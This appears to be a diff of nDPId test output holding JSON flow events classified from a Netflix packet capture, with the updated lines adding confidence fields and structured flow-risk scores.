-00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00567{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25":"HTTP suspicious content"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
